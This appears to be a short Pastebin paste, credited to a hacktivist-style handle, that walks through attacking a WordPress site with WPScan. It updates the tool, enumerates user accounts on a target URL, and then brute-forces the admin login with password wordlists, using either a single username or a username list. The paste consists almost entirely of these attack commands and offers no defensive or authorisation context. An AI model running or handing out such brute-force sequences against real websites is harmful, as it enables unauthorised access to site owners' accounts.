Advertisement
Guest User

Untitled

a guest
Jun 10th, 2022
128
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.46 KB | None | 0 0
  1. Indian Watchdogs ==> @Mr_Indian_Anon
  2.  
  3. * Open Linux. Now we are ready to Update WPScan tool on Kali Linux, Check WPscan Tools
  4. ==> wpscan --update
  5. * Scan Full Website for Admin Plane Login Username Fine
  6. ==> wpscan --url http://website.com/ -e u
  7. * Using Username
  8. ==> wpscan --url http://website.com/ -U admin -P /home/kali/Desktop/pass.txt
  9. Or
  10. * Using Username Wordlist File
  11. ==> wpscan --url http://website.com/ -U /root/Desktop/User.txt -P /home/kali/Desktop/pass.txt
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement